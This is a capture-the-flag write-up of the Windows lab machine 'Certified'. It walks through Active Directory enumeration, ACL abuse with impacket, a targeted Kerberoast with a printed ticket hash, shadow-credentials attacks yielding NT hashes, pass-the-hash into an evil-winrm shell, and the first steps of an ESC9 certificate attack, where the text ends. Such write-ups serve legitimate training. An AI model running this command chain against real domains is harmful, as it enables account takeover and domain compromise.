Box Info
  • Name: Certified
  • OS: Windows
  • Difficulty: Medium
  • IP: 10.10.11.41
  • Machine Creator: ruycr4ft
  • Machine Information: As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09

Certified is a Windows machine with a misconfigured ACL in an Active Directory environment, where initial access for a low-privileged user, Judith.mader, is provided. Exploiting the Active Directory Certificate Service (ADCS) is required to get access to the management_svc, ca_operator, and Administrator accounts by abusing shadow credentials and ESC9.

Listen to the Audio Overview by Gemini:

Gemini Link

Enumeration

Running nmap

# Nmap 7.94SVN scan initiated Tue Mar 18 13:17:25 2025 as: /usr/lib/nmap/nmap --privileged -n -Pn -v -sC -sV -oN nmap.txt 10.10.11.41
Nmap scan report for 10.10.11.41
Host is up (0.27s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-03-18 14:47:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2025-03-18T14:49:11+00:00; +6h59m59s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
|_ssl-date: 2025-03-18T14:49:12+00:00; +6h59m59s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-18T14:49:11+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-18T14:49:12+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Issuer: commonName=certified-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-13T15:49:36
| Not valid after:  2025-05-13T15:49:36
| MD5:   4e1f:97f0:7c0a:d0ec:52e1:5f63:ec55:f3bc
|_SHA-1: 28e2:4c68:aa00:dd8b:ee91:564b:33fe:a345:116b:3828
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m58s
| smb2-time:
|   date: 2025-03-18T14:48:31
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 18 13:19:14 2025 -- 1 IP address (1 host up) scanned in 108.32 seconds

Noting the following details:

  • Domain: certified.htb
  • DNS:DC01.certified.htb
  • Issuer: commonName=certified-DC01-CA

Adding to /etc/hosts

10.10.11.41     DC01.certified.htb certified.htb

Credential check

kali@kali:~$ netexec smb certified.htb -u judith.mader -p judith09
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09

kali@kali:~$ netexec ldap certified.htb -u judith.mader -p judith09
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.41     389    DC01             [+] certified.htb\judith.mader:judith09

kali@kali:~$ netexec wmi certified.htb -u judith.mader -p judith09
RPC         10.10.11.41     135    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb)
RPC         10.10.11.41     135    DC01             [+] certified.htb\judith.mader:judith09

We see that the provided credentials work with SMB, LDAP, WMI.

Shares accessible

kali@kali:~$ netexec smb dc01.certified.htb -u judith.mader -p judith09 --shares
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09
SMB         10.10.11.41     445    DC01             [*] Enumerated shares
SMB         10.10.11.41     445    DC01             Share           Permissions     Remark
SMB         10.10.11.41     445    DC01             -----           -----------     ------
SMB         10.10.11.41     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.41     445    DC01             C$                              Default share
SMB         10.10.11.41     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.41     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.41     445    DC01             SYSVOL          READ            Logon server share

[-] All we find is the standard shares for a Windows domain controller.

Checking for availability of ADCS CAs using netexec

kali@kali:~$ netexec smb certified.htb -u judith.mader -p judith09 -M enum_ca
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09
ENUM_CA     10.10.11.41     445    DC01             Active Directory Certificate Services Found.
ENUM_CA     10.10.11.41     445    DC01             http://10.10.11.41/certsrv/certfnsh.asp

Active Directory Certificate Services Found.

Using certipy

kali@kali:~$ certipy find -u judith.mader -p judith09 -dc-ip 10.10.11.41 -stdout -enabled
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
                    <----SNIP---->

open full output

  • Everything except Certified Authentication is part of Default certificate templates 1 on Windows servers.
  • We also see a user CERTIFIED.HTB\operator ca have Enrollment Rights.
  • And this certificate has NoSecurityExtension Enrollment Flag set.
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectAltRequireUpn
    Enrollment Flag                     : NoSecurityExtension
                                          AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Property Principals       : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
  • This is interesting! We now know the user CERTIFIED.HTB\operator ca has enrollment rights on this template and this template also has NoSecurityExtension flag set.
  • All roads go towards ESC9 attack to abuse AD-CS.

Bloodhound scan

We’ll be using BloodHound Community Edition 2

Collecting data

  • Install bloodhound-ce
kali@kali:~$ sudo apt install bloodhound-ce-python
  • Run Bloodhound collector using credentials and export as zip.
kali@kali:~$ bloodhound-ce-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 48S
INFO: Compressing output into 20250318133102_bloodhound.zip

Setting up

Install BloodHound Community Edition with Docker Compose 3

kali@kali:~$ mkdir -p /home/kali/tools/BloodHound/
kali@kali:~$ curl -L https://ghst.ly/getbhce > docker-compose.yml
kali@kali:~$ docker compose up

Ingest data into BloodHound

Exploring Attack Path

  • Go to http://localhost:8080/ui/explore.

  • Search for judith.mader and mark it as owned.

  • Select PathFinding.

    • Set JUDITH.MADER@CERTIFIED.HTB as Starting Node
    • Set CA_OPERATOR@CERTIFIED.HTB as Ending Node

  • We see JUDITH.MADER@CERTIFIED.HTB -> WriteOwner -> MANAGEMENT@CERTIFIED.HTB -> GenericWrite -> MANAGEMENT_SVC@CERTIFIED.HTB -> GenericAll -> CA_OPERATOR@CERTIFIED.HTB

  • Click on each path between the nodes to view the relationship information and understand how to abuse the permission.

PermissionDescription
WriteOwnerThe right to assume ownership of the object. The user must be an object trustee and cannot transfer the ownership to other users.
GenericWriteThe right to read permissions on this object, write all the properties on this object, and perform all validated writes to this object.
GenericAllThe right to create or delete children, delete a subtree, read and write properties, examine children and the object itself, add and remove the object from the directory, and read or write with an extended right.

Read more about Active Directory Rights and about WriteOwner, GenericWrite, GenericAll here

Foothold

Abuse WriteOwner to add judith.mader to the Management group. Then abuse the GenericWrite and get access to the management_svc account.

Following the steps given in Linux Abuse section in Bloodhound.

Abuse WriteOwner to add judith.mader to the Management group.

  1. Change the ownership of the object
kali@kali:~$ impacket-owneredit \
    -action write \
    -new-owner judith.mader \
    -target management \
    certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-1103
[*] - sAMAccountName: judith.mader
[*] - distinguishedName: CN=Judith Mader,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
  1. Add judith.mader to Management group
kali@kali:~$ net rpc group addmem management judith.mader \
    -U certified.htb/judith.mader%judith09 \
    -S 10.10.11.41

Could not add judith.mader to management: NT_STATUS_ACCESS_DENIED

We cannot add judith.mader yet Could not add judith.mader to management: NT_STATUS_ACCESS_DENIED

  1. Grant judith.mader the AddMember permission.
kali@kali:~$ impacket-dacledit \
    -action write \
    -rights WriteMembers \
    -principal judith.mader \
    -target management \
    certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250318-161851.bak
[*] DACL modified successfully!
  1. Now Add judith.mader to Management group
kali@kali:~$ net rpc group addmem management judith.mader \
    -U certified.htb/judith.mader%judith09 -S 10.10.11.41
# no output here
  1. Check if we are added to Management group
kali@kali:~$ net rpc group members Management \
    -U certified.htb/judith.mader%judith09 -S 10.10.11.41
CERTIFIED\judith.mader
CERTIFIED\management_svc

Abuse the GenericWrite and get access to the management_svc account.

Failed attempt for Targeted Kerberoast
  • Perform targetedKerberoast
/home/kali/tools/targetedKerberoast/targetedKerberoast.py -v -d certified.htb -u judith.mader -p judith09
  • we get KRB_AP_ERR_SKEW(Clock skew too great)
  • Sync the date
rdate -n 10.10.11.41
  • Rerun
kali@kali:~$ /home/kali/tools/targetedKerberoast/targetedKerberoast.py -v -d certified.htb -u judith.mader -p judith09
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (management_svc)
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$55349f9dc3ceab490b9a19b4979ca2b7$c916b8b4640a494a6691623088a0674ba91d8e014933cc56cb498d5f1edf0165b6aec33289133a500d355a2af93d0a1fc9c7bb14eac31cd1e55b86db849287c1acd5f3bd35414b38cdff35e756fbc361c5d4ecd34a96bfcb8248c39ec0d0abdaf83356978273c177a3ead80a41d9cb8922b043dfdd8454e28f60a957a73ae3c07986c7b352092603411096b7d326985c622d184e5fe36ef70682c4d5c7c6c1635441b79cd3b47d77162551692b73665fcf4de790edc26c65f1217a3d763a9e0c5645b8a06799d503414cb8a873c84d30f3b6fb6ea3e873218c98fcbe0589b6e83e1522a8645e417ed71904a90cefb7260c67f0fe1dea0cb1e80e537b6b1fb4fd560ae16f6201898c1d641b2a6495e4ed9c83b22a53035d957eef54faa67e9183592776b92020c03970791d7729bce06f84b1a880329ddd56e711670572b7d7884e0ab3d809d1e32ae14e928eec491f70f6ea600f1fb4905843fb883dc69089af22ae0c5682fe16764b1c31dbbdc8749d2cd246c5d55b9a0e9c4f53b1709dd355bb67d0904611362bf8d30b27858c2be935ff86124c18db4143312821faa25388b11259d260d0a3037fd81181dc7b602023a981ab6afebd8a5574db2b8ffaefc3eda305a3d15d4553dd1f4a5d6b07a1137b347df76f37b907b101a2a0acb45ee9a4c0a7f7d4b7b726eeea714321ce6f90daed9da56ad90a2fafe6b455620c733afa447950acdb56cfecaa1288e8e2f9dee39bd411b942cd895de460daa40f7e48f4f0cfade1625a8fc74d89639b7c2a385dfd560a861a679cd36fc296833e41ebc727a216236482cd86e91252356e687de949078af6d09fb0b510e9a3b95a136b73e405dae014105127f9ccd25a7e11423e889dcca7f1860b5401b53f66da500c35de1d6bff37c24336e16a57fd9615bc0d9f175b750e5dfccd82a92c663f0713c7400ffbd5c831ca60e060a4adcdeda492619189f0c902bd0041d1cace3462b3814bd3935842859c1dd0abbb8d3cbb62e5f2e0fd0bf1f4dcf6a69cdf865c15b2410477e2b547464d928882d87d6a8cbb3bde1195c6406d2e8650575cf5f2912ed1fd481e5c157ec116a67c91f96b8dd206df08c9e75b8c031f666619d2ae63ec3a97c49057ad59144089cb95d39bc404d3f2cb647a467ba5a96bcff3564f01e8b1c3c0424c87f2a3a370e88cb607de2ebad4fa23ff508d999c7296c17fcfcd486bcb573e39a19961f310af29a5841365bc499b2c1e2f3d8c6d23c8dc8663e92d39344500fba4e2dc508cbb931155d501d51855f1932929e4959c497df1c44d0566ead2a48debc42414f60964694a91616fb7efec997d0f71904806367e56c1f5666c0209301518e2417d9f1da21a8308f2b0e6f05e154653309df9184a516026a1faa9ab47238e3cbb06db1fcf557b5d2cade65acea9dc09bef5c4b39b39210840407206dd449fd22c03a3c8e0a92f134d5ac08cb843eec8bf17cf16b3a6300faee641713038d042892242e4dceb424e5bf8cc6e6467f018ff9613dee8d2967e0940f5ca593a40039f00e79c82d60d0cd93cf60a439612cff677
  • Put hash in certified.kb.hash
  • Run hashcat on host machine for faster cracking.
aditya@mint:~/tmp/cracking$ hashcat certified.kb.hash SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
                        <----SNIP---->
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
                        <----SNIP---->
  • Unable to crack

  • Shadow Credentials attack

(redo addition of judith.mader to the Management group as stuff gets cleaned up)

$ impacket-owneredit -action write -new-owner judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41
$ impacket-dacledit -action write -rights WriteMembers -principal judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.10.11.41
$ net rpc group addmem management judith.mader -U certified.htb/judith.mader%judith09 -S 10.10.11.41
  1. Running pywhisker
kali@kali:~$ pywhisker \
    -d certified.htb \
    -u judith.mader \
    -p judith09 \
    --target management_svc \
    --action add
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: ddd98447-0b45-2036-d590-f9a4db26c7cc
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: GyabvRCI.pfx
[+] PFX exportiert nach: GyabvRCI.pfx
[i] Passwort für PFX: CZtkCaDtEI7T7rZKwnRs
[+] Saved PFX (#PKCS12) certificate & key at path: GyabvRCI.pfx
[*] Must be used with password: CZtkCaDtEI7T7rZKwnRs
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
  1. get TGT using PKINITtools

resync clock skew rdate -n 10.10.11.41

kali@kali:~$ python /home/kali/tools/PKINITtools/gettgtpkinit.py \
    -cert-pfx GyabvRCI.pfx \
    -pfx-pass CZtkCaDtEI7T7rZKwnRs \
    -dc-ip 10.10.11.41 \
    certified.htb/management_svc management_svc.out.ccache
2025-03-18 23:49:42,687 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-03-18 23:49:42,721 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-03-18 23:49:57,375 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-03-18 23:49:57,375 minikerberos INFO     0c3977778b498c8db265b41988a98a7c9e863f1dce22ecb69ac1f2cf752a4790
INFO:minikerberos:0c3977778b498c8db265b41988a98a7c9e863f1dce22ecb69ac1f2cf752a4790
2025-03-18 23:49:57,377 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

TGT saved in management_svc.out.ccache

  1. get NTHASH using PKINITtools
kali@kali:~$ export KRB5CCNAME=management_svc.out.ccache

kali@kali:~$ python /home/kali/tools/PKINITtools/getnthash.py \
    -key 0c3977778b498c8db265b41988a98a7c9e863f1dce22ecb69ac1f2cf752a4790 \
    -dc-ip 10.10.11.41 \
    certified.htb/management_svc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091██████cdd4677c28b5a6a1295584

Recovered NT Hash a091██████cdd4677c28b5a6a1295584

  1. Pass the Hash and check if we can access via SMB
kali@kali:~$ netexec smb certified.htb \
    -u management_svc \
    -H a091██████cdd4677c28b5a6a1295584
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\management_svc:a091██████cdd4677c28b5a6a1295584

We can now access shell using management_svc accoutn and recovered NTHASH using evil-winrm

kali@kali:~$ evil-winrm -u management_svc  -H a091██████cdd4677c28b5a6a1295584 -i 10.10.11.41

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents>

Getting user.txt

*Evil-WinRM* PS C:\Users\management_svc\Desktop> type user.txt
87██████34b1df44bafef6f7c70a8697

we may also use certipy for performing shadow credentials attack

We may also use certipy for shadow credentials

kali@kali:~$ certipy shadow auto \
    -username judith.mader@certified.htb \
    -password judith09 \
    -account management_svc \
    -target certified.htb \
    -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b2ef91f2-161f-082e-e6ea-24c5969e4b2d'
[*] Adding Key Credential with device ID 'b2ef91f2-161f-082e-e6ea-24c5969e4b2d' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID 'b2ef91f2-161f-082e-e6ea-24c5969e4b2d' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Using principal: management_svc@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091██████cdd4677c28b5a6a1295584

Recovered NT Hash a091██████cdd4677c28b5a6a1295584

Lateral Movement

  • Getting access to ca_operator via management_svc.
  • This can be achieved as management_svc has GenericAll right on ca_operator.
  • This is the same as we discussed in earlier steps.
kali@kali:~$ certipy shadow auto \
    -username management_svc@certified.htb \
    -hashes :a091██████cdd4677c28b5a6a1295584 \
    -account ca_operator
    -target certified.htb
    -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'de811fc7-e311-54bf-67de-3148caea5c1b'
[*] Adding Key Credential with device ID 'de811fc7-e311-54bf-67de-3148caea5c1b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID 'de811fc7-e311-54bf-67de-3148caea5c1b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664██████f45d8f2

Pass the Hash and check if we can access via SMB

kali@kali:~$ netexec smb certified.htb \
    -u ca_operator \
    -H b4b86f45c6018f1b664██████f45d8f2
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\ca_operator:b4b86f45c6018f1b664██████f45d8f2

We now have access to ca_operator which has Enrollment Rights on CertifiedAuthentication template.

Privilege Escalation

ESC9 on template CertifiedAuthentication via ca_operator on CA certified-DC01-CA

Following conditions are met according for ESC9 attack 45

  • MANAGEMENT_SVC@CERTIFIED.HTB has GenericAll (comes with GenericWrite) on CA_OPERATOR@CERTIFIED.HTB
  • CA_OPERATOR@CERTIFIED.HTB is allowed to enroll in a vulnerable template CertifiedAuthentication.
  • Certificate CertifiedAuthentication has NoSecurityExtension flag set.

Running certipy to confirm.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81

kali@kali:~$ certipy find \
    -vulnerable \
    -u ca_operator \
    -hashes :b4b86f45c6018f1b664██████f45d8f2 \
    -dc-ip 10.10.11.41 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'certified-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'certified-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'certified-DC01-CA' via RRP
[*] Got CA configuration for 'certified-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireDirectoryPath
                                          SubjectAltRequireUpn
    Enrollment Flag                     : NoSecurityExtension
                                          AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
        Write Property Principals       : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
                                          CERTIFIED.HTB\Administrator
    [!] Vulnerabilities
      ESC9                              : 'CERTIFIED.HTB\\operator ca' can enroll and template has no security extension

Retriving Administrator’s NT hash

  1. First, the ca_operator’s hash is needed, we use management_svc to perform a Shadow Credentials attack.

We already have this from previous step

kali@kali:~$ certipy shadow auto \
    -username management_svc@certified.htb \
    -hashes :a091██████cdd4677c28b5a6a1295584 \
    -account ca_operator
    -target certified.htb
    -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'de811fc7-e311-54bf-67de-3148caea5c1b'
[*] Adding Key Credential with device ID 'de811fc7-e311-54bf-67de-3148caea5c1b' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID 'de811fc7-e311-54bf-67de-3148caea5c1b' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Using principal: ca_operator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664██████f45d8f2
  1. Then, the userPrincipalName of ca_operator is changed to Administrator.
kali@kali:~$ certipy account update \
    -username management_svc \
    -user ca_operator \
    -upn "Administrator" \
    -hashes :a091██████cdd4677c28b5a6a1295584 \
    -target certified.htb \
    -dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
